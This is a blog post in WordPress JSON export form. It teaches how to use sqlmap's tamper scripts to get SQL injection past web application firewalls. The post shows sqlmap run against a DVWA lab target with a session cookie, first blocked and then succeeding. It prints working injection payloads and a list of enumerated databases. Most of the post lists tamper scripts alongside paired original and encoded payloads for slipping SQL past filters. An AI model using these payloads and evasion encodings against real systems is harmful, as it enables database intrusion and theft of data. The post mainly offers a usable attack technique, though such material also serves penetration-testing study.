{"id":544,"date":"2015-08-19T03:42:36","date_gmt":"2015-08-19T00:42:36","guid":{"rendered":"https:\/\/furkansandal.com\/sqlmapi-waf-bypass-scriptleri-ile-kullanma\/"},"modified":"2015-08-19T03:42:36","modified_gmt":"2015-08-19T00:42:36","slug":"sqlmapi-waf-bypass-scriptleri-ile-kullanma","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/sqlmapi-waf-bypass-scriptleri-ile-kullanma\/","title":{"rendered":"Using SQLmap with WAF Bypass Scripts"},"content":{"rendered":"
\n
\n<\/div>\n

Even when a SQL Injection<\/b> vulnerability has been identified on the target system, if the SQLi commands are not processed under normal conditions, they are most likely being detected and blocked by a WAF (Web Application Firewall) behind the scenes.<\/p>\n

In SQL Injection attacks we use various bypass methods, for example mixing upper and lower case, or encoding the commands with various encoding algorithms.<\/p>\n

SQLmap has a “tamper script<\/b>” feature for bypassing attack-prevention systems such as WAF and IPS.<\/p>\n

Below, SQLmap is run with its default parameters against a system protected by a WAF, and no result is obtained:<\/p>\n

\nroot@bt:\/pentest\/database\/sqlmap# .\/sqlmap.py -u \"http:\/\/1.2.3.4\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit#\" --cookie \"security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb\" --dbs<\/i><\/b>\u00a0<\/p><\/blockquote>\n

\n\u00a0 \u00a0 sqlmap\/1.0-dev-dea6218 – automatic SQL injection and database takeover tool
\u00a0 \u00a0 http:\/\/sqlmap.org\u00a0<\/p><\/blockquote>\n

\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:39:43
[15:39:43] [INFO] testing connection to the target url
[15:39:43] [INFO] heuristics detected web page charset ‘ascii’
[15:39:43] [WARNING] reflective value(s) found and filtering out
[15:39:43] [INFO] heuristic (parsing) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
[15:39:43] [INFO] testing for SQL injection on GET parameter ‘id’
[15:39:43] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[15:39:43] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:44] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:45] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:46] [CRITICAL] unable to connect to the target url or proxy
[15:39:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:47] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[15:39:48] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<\/p><\/blockquote>\n

\nAs can be seen, the target system has a mechanism that blocks requests when the UNION command appears in them.<\/p>\n

Now let's use SQLmap together with the --tamper<\/b> option:<\/p>\n

\nroot@bt:\/pentest\/database\/sqlmap# .\/sqlmap.py -u \"http:\/\/1.2.3.4\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit#\" --cookie \"security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb\" --tamper \"tamper\/randomcase.py\" --dbs<\/i><\/b>\u00a0<\/p><\/blockquote>\n

\n[*] starting at 16:16:24\u00a0<\/p><\/blockquote>\n

\n[16:16:24] [INFO] loading tamper script ‘randomcase’<\/span><\/b>
[16:16:24] [INFO] testing connection to the target url
[16:16:25] [INFO] testing if the url is stable, wait a few seconds
[16:16:26] [INFO] url is stable
[16:16:26] [INFO] testing if GET parameter ‘id’ is dynamic
[16:16:26] [WARNING] GET parameter ‘id’ appears to be not dynamic
[16:16:26] [INFO] heuristics detected web page charset ‘ascii’
[16:16:26] [WARNING] reflective value(s) found and filtering out
[16:16:26] [INFO] heuristic test shows that GET parameter ‘id’ might be injectable (possible DBMS: MySQL)
[16:16:26] [INFO] testing for SQL injection on GET parameter ‘id’
[16:16:26] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[16:16:26] [INFO] GET parameter ‘id’ seems to be ‘AND boolean-based blind – WHERE or HAVING clause’ injectable (with –string=’Surname: admin’)
[16:16:26] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[16:16:26] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’ injectable
[16:16:26] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:16:27] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
[16:16:37] [INFO] GET parameter ‘id’ is ‘MySQL > 5.0.11 AND time-based blind’ injectable
[16:16:37] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 20 columns’
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:16:37] [INFO] target url appears to have 2 columns in query
[16:16:37] [INFO] GET parameter ‘id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:

Place: GET
Parameter: id
\u00a0 \u00a0 Type: boolean-based blind
\u00a0 \u00a0 Title: AND boolean-based blind – WHERE or HAVING clause
\u00a0 \u00a0 Payload: id=1 AND 3106=3106&Submit=Submit
\u00a0 \u00a0 Type: error-based
\u00a0 \u00a0 Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
\u00a0 \u00a0 Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
\u00a0 \u00a0 Type: UNION query
\u00a0 \u00a0 Title: MySQL UNION query (NULL) – 2 columns
\u00a0 \u00a0 Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit
\u00a0 \u00a0 Type: AND\/OR time-based blind
\u00a0 \u00a0 Title: MySQL > 5.0.11 AND time-based blind
\u00a0 \u00a0 Payload: id=1 AND SLEEP(5)&Submit=Submit

[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[16:16:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[16:16:41] [INFO] fetching database names
available databases [7]:
[*] beyazsapka
[*] dvwa
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] yenibir_siparis
[16:16:41] [INFO] fetched data logged to text files under ‘\/pentest\/database\/sqlmap\/output\/192.168.1.127’
[*] shutting down at 16:16:41<\/p><\/blockquote>\n

\nAs can be seen, the protective mechanism on the target system has been bypassed.<\/p>\n

The “tamper<\/b>” folder in SQLmap's installation directory contains various bypass scripts. In the test above we used the “randomcase.py<\/b>” script from the “tamper” folder. This script rewrites SQL keywords such as UNION in random upper and lower case before sending them to the target system, which bypasses the WAF if one is present.<\/p>\n

Below I have listed the names of the other bypass scripts in the tamper folder, their bypass methods, and the database platforms on which they work:<\/p>\n

apostrophemask.py (UTF-8)<\/span><\/b>
Example:
* Original Command: AND ‘1’=’1′<\/b>
* Bypass Command: \u00a0AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87<\/b><\/p>\n

apostrophenullencode.py (unicode)<\/span><\/b>
Example:
* Original Command: AND ‘1’=’1′<\/b>
* Bypass Command: \u00a0AND %271%27=%271%27<\/b><\/p>\n

appendnullbyte.py ()<\/span><\/b>
Example:
* Original Command: AND 1=1<\/b>
* Bypass Command: \u00a0AND 1=1<\/b>
Platform:
* Microsoft Access<\/p>\n

base64encode.py (base64)<\/span><\/b>
Example:
* Original Command: 1′ AND SLEEP(5)#<\/b>
* Bypass Command: \u00a0MScgQU5EIFNMRUVQKDUpIw==<\/b><\/p>\n

between.py (\u201cnot between\u201d \u201c>\u201d)<\/span><\/b>
Example:
* Original Command: ‘A > B’<\/b>
* Bypass Command: \u00a0‘A NOT BETWEEN 0 AND B’<\/b><\/p>\n

bluecoat.py (\u201clike\u201d \u201c=\u201d)<\/span><\/b>
Example:
* Original Command: SELECT id FROM users where id = 1<\/b>
* Bypass Command: \u00a0SELECT%09id FROM users where id LIKE 1<\/b>
Platform:
* MySQL 5.1, SGOS<\/p>\n

chardoubleencode.py<\/span><\/b>
Example:
* Original Command: SELECT FIELD FROM%20TABLE<\/b>
* Bypass Command: \u00a0%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545<\/b><\/p>\n

charencode.py<\/span><\/b>
Example:
* Original Command: SELECT FIELD FROM%20TABLE<\/b>
* Bypass Command: \u00a0%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45<\/b><\/p>\n

charunicodeencode.py<\/span><\/b>
Example:
* Original Command: SELECT FIELD%20FROM TABLE<\/b>
* Bypass Command: \u00a0%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′<\/b>
Platform:
* ASP
* ASP.NET<\/p>\n

equaltolike.py (\u201clike\u201d \u201c=\u201d)<\/span><\/b>
Example:
* Original Command: SELECT * FROM users WHERE id=1<\/b>
* Bypass Command: \u00a0SELECT * FROM users WHERE id LIKE 1<\/b><\/p>\n

halfversionedmorekeywords.py<\/span><\/b>
Example:
* Original Command: value‘ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa<\/b>
* Bypass Command: \u00a0value‘\/*!0UNION\/*!0ALL\/*!0SELECT\/*!0CONCAT(\/*!0CHAR(58,107,112,113,58),\/*!0IFNULL(CAST(\/*!0CURRENT_USER()\/*!0AS\/*!0CHAR),\/*!0CHAR(32)),\/*!0CHAR(58,97,110,121,58)), NULL, NULL#\/*!0AND ‘QDWa’=’QDWa<\/b>
Platform:
* MySQL < 5.1<\/p>\n

ifnull2ifisnull.py (\u201cIF(ISNULL(A), B, A)\u201d \u201cIFNULL(A, B)\u201d)<\/span><\/b>
Example:
* Original Command: IFNULL(1, 2)<\/b>
* Bypass Command: \u00a0IF(ISNULL(1), 2, 1)<\/b>
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)<\/p>\n

modsecurityversioned.py<\/span><\/b>
Example:
* Original Command: 1 AND 2>1–<\/b>
* Bypass Command: \u00a01 \/*!30000AND 2>1*\/–<\/b>
Platform:
* MySQL<\/p>\n

modsecurityzeroversioned.py (\u201c0000\u201d)<\/span><\/b>
Example:
* Original Command: 1 AND 2>1–<\/b>
* Bypass Command: \u00a01 \/*!00000AND 2>1*\/–<\/b>
Platform:
* MySQL<\/p>\n

multiplespaces.py<\/span><\/b>
Example:
* Original Command: UNION SELECT<\/b>
* Bypass Command: \u00a0 UNION \u00a0 SELECT<\/b><\/p>\n

nonrecursivereplacement.py<\/span><\/b>
Example:
* Original Command: 1 UNION SELECT 2–<\/b>
* Bypass Command: \u00a01 UNUNIONION SELSELECTECT 2–<\/b><\/p>\n

percentage.py (\u201c%\u201d)<\/b><\/span>
Example:
* Original Command: SELECT FIELD FROM TABLE<\/b>
* Bypass Command: \u00a0%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E<\/b>
Platform:
* ASP<\/p>\n

randomcase.py<\/span><\/b>
Example:
* Original Command: INSERT<\/b>
* Bypass Command: \u00a0InsERt<\/b><\/p>\n

randomcomments.py<\/span><\/b>
Example:
‘INSERT’ becomes ‘IN\/**\/S\/**\/ERT’<\/b><\/p>\n

securesphere.py<\/span><\/b>
Example:
* Original Command: AND 1=1<\/b>
* Bypass Command: \u00a0AND 1=1 and ‘0having’=’0having’<\/b><\/p>\n

sp_password.py (\u201csp_password\u201d)<\/span><\/b>
Example:
* Original Command: 1 AND 9227=9227–<\/b>
* Bypass Command: \u00a01 AND 9227=9227–sp_password<\/b>
Platform:
* MSSQL<\/p>\n

space2comment.py<\/span><\/b>
Example:
* Original Command: SELECT id FROM users<\/b>
* Bypass Command: \u00a0SELECT\/**\/id\/**\/FROM\/**\/users<\/b><\/p>\n

space2dash.py (\u201c–\u201d)<\/span><\/b>
Example:
* Original Command: 1 AND 9227=9227<\/b>
* Bypass Command: \u00a01–PTTmJopxdWJ%0AAND–cWfcVRPV%0A9227=9227<\/b>
Platform:
* MSSQL
* SQLite<\/p>\n

space2hash.py<\/span><\/b>
Example:
* Original Command: 1 AND 9227=9227<\/b>
* Bypass Command: \u00a01%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227<\/b>
Platform:
* MySQL<\/p>\n

space2morehash.py<\/span><\/b>
Platform:
* MySQL >= 5.1.13<\/p>\n

space2mssqlblank.py<\/span><\/b>
Example:
* Original Command: SELECT id FROM users<\/b>
* Bypass Command: \u00a0SELECT%08id%02FROM%0Fusers<\/b>
Platform:
* Microsoft SQL Server<\/p>\n

space2mssqlhash.py<\/span><\/b>
Example:
* Original Command: 1 AND 9227=9227<\/b>
* Bypass Command: \u00a01%23%0A9227=9227<\/b>
Platform:
* MSSQL
* MySQL<\/p>\n

space2mysqlblank.py<\/span><\/b>
Example:
* Original Command: SELECT id FROM users<\/b>
* Bypass Command: \u00a0SELECT%0Bid%0BFROM%A0users<\/b>
Platform:
* MySQL<\/p>\n

space2mysqldash.py<\/span><\/b>
Example:
* Original Command: 1 AND 9227=9227<\/b>
* Bypass Command: \u00a01–%0AAND–%0A9227=9227<\/b>
Platform:
* MySQL
* MSSQL<\/p>\n

space2plus.py (\u201c+\u201d)<\/span><\/b>
Example:
* Original Command: SELECT id FROM users<\/b>
* Bypass Command: \u00a0SELECT+id+FROM+users<\/b><\/p>\n

space2randomblank.py<\/span><\/b>
Example:
* Original Command: SELECT id FROM users<\/b>
* Bypass Command: \u00a0SELECTridtFROMnusers<\/b><\/p>\n

unionalltounion.py (\u201cunion all\u201d \u201cunion\u201d)<\/span><\/b>
Example:
* Original Command: -1 UNION ALL SELECT<\/b>
* Bypass Command: \u00a0-1 UNION SELECT<\/b><\/p>\n

unmagicquotes.py (\u201c%bf%27\u201d \u201c–\u201d)<\/b><\/span>
Example:
* Original Command: 1′ AND 1=1<\/b>
* Bypass Command: \u00a01%bf%27 AND 1=1–%20<\/b><\/p>\n

versionedkeywords.py<\/span><\/b>
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#<\/b>
* Bypass Command: \u00a01\/*!UNION*\/\/*!ALL*\/\/*!SELECT*\/\/*!NULL*\/,\/*!NULL*\/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()\/*!AS*\/\/*!CHAR*\/),CHAR(32)),CHAR(58,100,114,117,58))#<\/b>
Platform:
* MySQL<\/p>\n

versionedmorekeywords.py<\/span><\/b>
Example:
* Original Command: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#<\/b>
* Bypass Command: \u00a01\/*!UNION*\/\/*!ALL*\/\/*!SELECT*\/\/*!NULL*\/,\/*!NULL*\/,\/*!CONCAT*\/(\/*!CHAR*\/(58,122,114,115,58),\/*!IFNULL*\/(CAST(\/*!CURRENT_USER*\/()\/*!AS*\/\/*!CHAR*\/),\/*!CHAR*\/(32)),\/*!CHAR*\/(58,115,114,121,58))#<\/b>
Platform:
* MySQL >= 5.1.13<\/p>\n

Good luck with your work.<\/i>\n<\/p>\n<\/div>\n

\nFurkan SANDAL<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Even when a SQL Injection vulnerability has been identified on the target system, if the SQLi commands are not processed under normal conditions, most likely a WAF (Web…<\/p>\n","protected":false},"author":1,"featured_media":469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[78,76,88,89,26,83,81,79,82,77,80,84,85,87,86],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/ssh.jpg?fit=500%2C500&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-8M","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/544"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=544"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/544\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/469"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=544"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}